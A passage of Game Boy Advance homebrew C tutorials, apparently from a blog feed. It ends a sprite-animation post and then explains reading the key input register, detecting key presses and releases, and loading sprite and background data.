<p>Alright, here’s our first, and easiest case: jumping. We only have 2 sprites for jumping, one when we’re on the way up, and one when we’re on the way down.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="n">isMidAir</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">!=</span> <span class="n">FLOOR_Y</span><span class="p">;</span>
<span class="c1">//in the air: pick the rising or falling jump frame</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isMidAir</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">56</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">></span> <span class="mi">0</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we aren’t in the air, the only other two options are that we’re standing still, or that we’re walking around:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">else</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">32</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="mi">3</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Obviously none of this code is very reusable; we are hardcoding both the length of the anim cycles and their start points in the sprite sheet, but it works for our example.</p>
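<p>If you did want something more reusable, one option is to describe each cycle as data instead of hardcoding it in the branches. This is only a sketch of that idea, not what the finished project does: the AnimCycle struct, the ANIM_* tables, and both helper functions are hypothetical names, and the numbers are simply the ones hardcoded above.</p>

```c
/* Hypothetical description of one animation cycle. */
typedef struct AnimCycle
{
    int firstTile;  /* tile index where the cycle starts */
    int frameCount; /* number of frames in the cycle     */
} AnimCycle;

/* The same values that are hardcoded in the function above. */
const AnimCycle ANIM_IDLE = { 0, 4 };
const AnimCycle ANIM_RUN  = { 32, 3 };
const AnimCycle ANIM_JUMP = { 56, 2 };

#define TILE_SLOTS_PER_FRAME 8 /* 4 tiles per frame, 2 slots per 8bpp tile */

/* Advance to the next frame, wrapping around at the end of the cycle. */
int nextFrame(const AnimCycle* cycle, int currentFrame)
{
    return (currentFrame + 1) % cycle->frameCount;
}

/* Tile index to write into attr2 for a given frame of a cycle. */
int tileForFrame(const AnimCycle* cycle, int frame)
{
    return cycle->firstTile + (frame * TILE_SLOTS_PER_FRAME);
}
```

<p>Adding a new cycle then means adding one more table entry rather than another branch with its own magic numbers.</p>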
<p>With the jumping and walking/idle chunks of code added to our animation function, all that’s left is to call the animation function from main:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">updateSpritePosition</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">);</span>
<span class="n">tickSpriteAnimation</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">);</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
<p>And you should (finally) be in possession of your very own animated character!</p>
<h2 id="wrapping-up">Wrapping Up</h2>
<p>If you got stuck at any part of this, the code for the finished product can be found <a href="https://github.com/khalladay/GBA-By-Example/tree/master/4-SpriteAnimation">on github</a>.</p>
<p>Finally, as always, I’m available <a href="https://twitter.com/khalladay">on Twitter</a> to answer questions, say hi, etc. I’d love to hear if you’re building something for the GBA after reading these posts :)</p>
<p>Have a good one!</p>
GBA By Example - Getting User Input2017-04-18T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/04/18/GBA-By-Example-4<p>(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p>We’ve covered an awful lot of drawing in these posts, but it takes a lot more than drawing code to make a game. One of the key parts of building something playable is letting users actually be able to interact with our code, so today I’m going to go over how to get user input on the GBA. It’s going to be short and sweet, because it’s really not that complicated on this platform, which is great, because it means that we can spend more time on building an example program this week.</p>
<p>By the end of the post today, we’re going to end up with a simple program that displays a sprite and changes the background based on what button was last pressed. It’s going to look something like this:</p>
<div align="center">
<img src="/images/post_images/2017-04-18/input.gif" />
<font size="2"> Initially this cleared the screen after each press so I could properly do the Konami code.<br />The gif was reeeaalllyy annoying though</font>
<br /><br />
</div>
<p>Let’s get started :)</p>
<h2 id="detecting-what-keys-are-pressed">Detecting What Keys Are Pressed</h2>
<p>I assume if you’re interested in these posts, you already know what a GBA looks like. Just in case, here’s a photo with all the inputs shown:</p>
<div align="center">
<img src="/images/post_images/2017-04-18/gba.jpg" />
<br />
</div>
<p>The GBA has 10 buttons that the user can press while a game is running:</p>
<ul>
<li>A / B buttons</li>
<li>Start / Select Buttons</li>
<li>R / L Shoulder Buttons</li>
<li>DPAD - (Left, Right, Up, Down)</li>
</ul>
<p>Each of these buttons can be in one of two states - down or up. Conveniently, the state of every button is stored in a single 16 bit value (with only the lower 10 bits used). This value is known as the <em>Input</em> Register. It, and the location of each key’s corresponding bit are as follows:</p>
<div align="center">
<table style="border:1px solid black; width:600px; padding:2px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>REG_KEYINPUT</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FEDCBA</td>
<td style="border:1px solid black;">Ignored / Undefined Data</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">9</td>
<td>Left Shoulder Button </td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">8</td>
<td>Right Shoulder Button</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">7</td>
<td>DPAD -> Down</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">6</td>
<td>DPAD -> Up</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">5</td>
<td>DPAD -> Left</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">4</td>
<td>DPAD -> Right</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">3</td>
<td>Start Button</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">2</td>
<td>Select Button</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">1</td>
<td>B Button</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">0</td>
<td>A Button</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>The only bit of weirdness with all of this is that the GBA represents keys which are in their Up (un-pressed) state with a value of 1, and keys that are pressed with a value of 0. This means that if we were to read the value of the input register while the Start button was pressed, we would expect to see a binary value of <strong>0000 0011 1111 0111</strong> (0x03F7). Notice that the bit that corresponds to the Start button is 0, because the button is down.</p>
<p>Turning the above table into a set of constants representing which bit is set for each key looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_KEYINPUT (* (volatile uint16*) 0x4000130)
</span>
<span class="cp">#define KEY_A 0x0001
#define KEY_B 0x0002
#define KEY_SELECT 0x0004
#define KEY_START 0x0008
#define KEY_RIGHT 0x0010
#define KEY_LEFT 0x0020
#define KEY_UP 0x0040
#define KEY_DOWN 0x0080
#define KEY_R 0x0100
#define KEY_L 0x0200
</span>
<span class="cp">#define KEY_MASK 0xFC00</span></code></pre></figure>
<p>Using the constants above, a function that returns a non-zero value if a key is down might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint32</span> <span class="nf">getKeyState</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">!</span><span class="p">(</span><span class="n">key_code</span> <span class="o">&</span> <span class="p">(</span><span class="n">REG_KEYINPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">)</span> <span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Because we aren’t immediately inverting the value in the input register (like <a href="http://www.coranac.com/tonc/text/keys.htm">Tonc</a> does), the bitwise logic for this can be a bit unintuitive, so let’s walk through how the above function works.</p>
<p>For the example, let’s assume that we’re testing to see if the Start button is currently pressed:</p>
<ul>
<li>First, we get the value from the REG_KEYINPUT register, and OR it with a bit mask that makes sure the undefined bits in the value are set to 1 (called KEY_MASK above)</li>
</ul>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="nl">INPUT:</span> <span class="o">????</span> <span class="o">??</span><span class="mi">11</span> <span class="mi">1111</span> <span class="mo">0111</span>
<span class="n">FLAG</span> <span class="o">:</span> <span class="mi">1111</span> <span class="mi">1100</span> <span class="mo">0000</span> <span class="mo">0000</span>
<span class="o">--------------------------</span>
<span class="mi">1111</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mo">0111</span></code></pre></figure>
<ul>
<li>Next we AND the value with the Start mask: 0x0008</li>
</ul>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="nl">INPUT:</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mo">0111</span>
<span class="n">START</span><span class="o">:</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mi">1000</span>
<span class="o">--------------------------</span>
<span class="n">val</span><span class="o">=</span> <span class="mi">0</span><span class="n">x</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span>
<span class="nf">return</span> <span class="p">(</span><span class="o">!</span><span class="n">val</span><span class="p">);</span> <span class="c1">//true, key is DOWN</span></code></pre></figure>
<ul>
<li>
<p>This gives us 0, because of how the GBA stores key states (remember, 1 is UP), so we return the logical NOT of the result. That way we get a non-zero value when the button is down</p>
</li>
<li>
<p>If instead of the Start Mask, we checked a different button, like the A Button:</p>
</li>
</ul>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="nl">INPUT:</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mi">1111</span> <span class="mo">0111</span>
<span class="n">A</span> <span class="n">BTN</span><span class="o">:</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0001</span>
<span class="o">--------------------------</span>
<span class="n">val</span><span class="o">=</span> <span class="mi">0</span><span class="n">x</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0000</span> <span class="mo">0001</span>
<span class="nf">return</span> <span class="p">(</span><span class="o">!</span><span class="n">val</span><span class="p">);</span> <span class="c1">//false, key is UP</span></code></pre></figure>
<p>The KEY_MASK constant is important for this function to work, because we have no idea what the top 6 bits of this value are set to (whatever it is, it’s junk data), and we want to be sure that we’re only testing our key_code value against data that we expect to be in the input register.</p>
<p>Always masking the REG_KEYINPUT register by the KEY_MASK value seems a bit excessive to me though. What I prefer to do (and what you’ll see elsewhere online) is to use a function that stores the value of the input register in a 16 bit variable and performs the masking at that point. This function is called once per frame, and then you don’t have to worry about OR-ing with KEY_MASK every time you want to check a key:</p>
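<p>If you want to check the walkthrough above without a GBA or an emulator handy, the same logic can be run on a desktop by passing the register value in as a parameter. This is just a sketch for experimenting: keyStateFromRaw is a hypothetical name, and the raw values you feed it are whatever you imagine the hardware returning.</p>

```c
#include <stdint.h>

#define KEY_A     0x0001
#define KEY_START 0x0008
#define KEY_MASK  0xFC00

/* Same logic as getKeyState above, except the register value is an
   argument instead of a hardware read, so it can run anywhere. */
uint32_t keyStateFromRaw(uint16_t raw, uint16_t key_code)
{
    /* Force the undefined top 6 bits to 1 ("up"), then test the key's bit.
       A 0 bit means the key is down, so invert the result. */
    return !(key_code & (raw | KEY_MASK));
}
```

<p>Passing in 0x03F7 (the Start-is-down value from earlier) returns non-zero for KEY_START and zero for KEY_A, matching the two worked examples.</p>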
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint16</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">key_poll</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">input_cur</span> <span class="o">=</span> <span class="n">REG_KEYINPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">uint32</span> <span class="nf">getKeyState</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">!</span><span class="p">(</span><span class="n">input_cur</span> <span class="o">&</span> <span class="n">key_code</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_L</span><span class="p">)</span> <span class="p">)</span>
<span class="p">{</span>
<span class="c1">//key is down</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>This works, but it only lets us test whether the user is currently holding down a key; it doesn’t let us detect whether the key has just been pressed. That’s fine for things like charging an attack, but not as good for something like triggering a jump, because it’s going to read as true for multiple frames unless your user has the reflexes of a cat.</p>
<h2 id="detecting-key-press-and-key-release">Detecting Key Press and Key Release</h2>
<p>The obvious next thing we need to do is to be able to detect if the user has just started pressing or releasing a button. To do this, we need to store a second input state variable, that holds the input of the previous frame. To determine if a key’s state is new, we just have to compare the current frame’s input register to the one from the previous frame. It makes sense to do this register-copying inside the function we use to store the current frame’s input:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint16</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">input_prev</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">key_poll</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">input_prev</span> <span class="o">=</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="n">input_cur</span> <span class="o">=</span> <span class="n">REG_KEYINPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Then all we need are two new functions to detect key press and release:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uint16</span> <span class="nf">wasKeyPressed</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="o">~</span><span class="n">input_cur</span> <span class="o">&</span> <span class="n">input_prev</span><span class="p">)</span> <span class="o">&</span> <span class="n">key_code</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">uint16</span> <span class="nf">wasKeyReleased</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">input_cur</span> <span class="o">&</span> <span class="o">~</span><span class="n">input_prev</span><span class="p">)</span> <span class="o">&</span> <span class="n">key_code</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re confused by the above, writing it out on paper really helps, but I’m going to skip walking through it here because it really only matters long enough to write the above functions.</p>
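<p>For anyone who would rather poke at it in code than on paper, here is a small desktop-runnable sketch of the same idea. The function names are hypothetical, and the previous and current frame values are passed in as arguments rather than read from globals. The one thing to keep in mind is the active-low convention: a bit of 1 means the key is up, 0 means it is down.</p>

```c
#include <stdint.h>

#define KEY_A 0x0001

/* A key was pressed this frame if its bit was 1 (up) last frame
   and is 0 (down) now. */
uint16_t pressedThisFrame(uint16_t prev, uint16_t cur, uint16_t key_code)
{
    return (uint16_t)(key_code & (~cur & prev));
}

/* A key was released this frame if its bit was 0 (down) last frame
   and is 1 (up) now. */
uint16_t releasedThisFrame(uint16_t prev, uint16_t cur, uint16_t key_code)
{
    return (uint16_t)(key_code & (cur & ~prev));
}
```

<p>Going from 0xFFFF (nothing held) to 0xFFFE (A held) reports a press for KEY_A on that frame only; staying at 0xFFFE on the next frame reports neither a press nor a release.</p>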
<p>When it’s all put together, your input handling code might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#ifndef INPUT_H
#define INPUT_H
</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">input_cur</span> <span class="o">=</span> <span class="mh">0x03FF</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">input_prev</span> <span class="o">=</span> <span class="mh">0x03FF</span><span class="p">;</span>
<span class="cp">#define REG_KEYINPUT (* (volatile unsigned short*) 0x4000130)
</span>
<span class="cp">#define KEY_A 0x0001
#define KEY_B 0x0002
#define KEY_SELECT 0x0004
#define KEY_START 0x0008
#define KEY_RIGHT 0x0010
#define KEY_LEFT 0x0020
#define KEY_UP 0x0040
#define KEY_DOWN 0x0080
#define KEY_R 0x0100
#define KEY_L 0x0200
</span>
<span class="cp">#define KEY_MASK 0xFC00
</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">key_poll</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">input_prev</span> <span class="o">=</span> <span class="n">input_cur</span><span class="p">;</span>
<span class="n">input_cur</span> <span class="o">=</span> <span class="n">REG_KEYINPUT</span> <span class="o">|</span> <span class="n">KEY_MASK</span><span class="p">;</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">wasKeyPressed</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">key_code</span><span class="p">)</span> <span class="o">&</span> <span class="p">(</span><span class="o">~</span><span class="n">input_cur</span> <span class="o">&</span> <span class="n">input_prev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">wasKeyReleased</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">key_code</span><span class="p">)</span> <span class="o">&</span> <span class="p">(</span><span class="n">input_cur</span> <span class="o">&</span> <span class="o">~</span><span class="n">input_prev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">getKeyState</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">!</span><span class="p">(</span><span class="n">key_code</span> <span class="o">&</span> <span class="p">(</span><span class="n">input_cur</span><span class="p">)</span> <span class="p">);</span>
<span class="p">}</span>
<span class="cp">#endif</span></code></pre></figure>
<p>That’s literally all there is to input handling on the GBA! You can stop here if that’s all you’re after, but I took it a step further and built the program you saw at the start of the article. I’m going to walk through how to put that together below.</p>
<p>For the remainder of this post, and all future posts, I’m going to put the input handling code above into <strong>input.h</strong>.</p>
<h2 id="sprite-and-bg-data">Sprite and BG Data</h2>
<p>All the sprites that I’m using for the example project can be found <a href="https://github.com/khalladay/GBA-By-Example/tree/master/3-UserInput/data">on github</a>. The data isn’t super compact, but for such a simple program, that’s not really that important. If you want to follow along as I build this, grab the data from there. If you just want the final product, you can find the whole thing <a href="https://github.com/khalladay/GBA-By-Example/tree/master/3-UserInput">on github here</a>.</p>
<p>The function to load the sprite data is as follows:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define MEM_PALETTE ((uint16*)(0x05000200))
#define MEM_TILE ((TileBlock*)0x6000000)
#define MEM_OAM ((volatile ObjectAttributes *)0x07000000)
</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">ObjectAttributes</span> <span class="p">{</span>
<span class="n">uint16</span> <span class="n">attr0</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr1</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr2</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">pad</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">packed</span><span class="p">,</span> <span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span> <span class="n">ObjectAttributes</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">LoadTileData</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//each sprite is 32 tiles</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">Pal</span><span class="p">,</span> <span class="n">PalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">ATiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">32</span><span class="p">],</span> <span class="n">BTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">64</span><span class="p">],</span> <span class="n">SelectTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">96</span><span class="p">],</span> <span class="n">StartTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">128</span><span class="p">],</span> <span class="n">RIGHTTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">160</span><span class="p">],</span> <span class="n">LEFTTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">192</span><span class="p">],</span> <span class="n">UPTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">224</span><span class="p">],</span> <span class="n">DOWNTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">5</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">LTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">5</span><span class="p">][</span><span class="mi">32</span><span class="p">],</span> <span class="n">RTiles</span><span class="p">,</span> <span class="n">TileLen</span><span class="p">);</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x602F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0xC04F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I’m not going to walk through this, because we’ve already covered how to load and set up sprites in <a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">a previous post</a>.</p>
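<p>If the indexing in those memcpy calls looks opaque, here is a small host-side sketch (it runs on a PC, not the GBA) of the address arithmetic behind <code>&amp;MEM_TILE[block][tile]</code>. The helper name <code>tile_address</code> and the <code>VRAM_BASE</code> constant are mine, not part of the article's code, and I'm assuming each sprite's <code>TileLen</code> is 32 tiles of 64 bytes each.</p>

```c
#include <stdint.h>

/* Same layout as the typedefs above: one 8bpp tile is 32 halfwords
   (64 bytes), and a tile block holds 256 of them (16 KB). */
typedef uint16_t Tile[32];
typedef Tile TileBlock[256];

#define VRAM_BASE 0x06000000u /* hypothetical name for the MEM_TILE base */

/* Address that &MEM_TILE[block][tile] resolves to on the hardware. */
static uint32_t tile_address(uint32_t block, uint32_t tile)
{
    return VRAM_BASE
         + block * (uint32_t)sizeof(TileBlock)
         + tile * (uint32_t)sizeof(Tile);
}
```

<p>Under those assumptions, eight 32-tile sprites fill tile block 4 exactly, which would explain why the L and R sprites start at the beginning of block 5.</p>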
<p>I’m also using a simple 1 colour background in the gif from earlier, which I just created procedurally like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
#define REG_BG0_CONTROL *((volatile uint32*)(0x04000008))
</span>
<span class="kt">void</span> <span class="nf">CreateBackground</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">MEM_BG_PALETTE</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">RGB15</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
<span class="n">uint8</span> <span class="n">tile</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="mi">64</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">tile</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">tile</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
<span class="n">uint16</span> <span class="n">screenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">1024</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">screenBlock</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
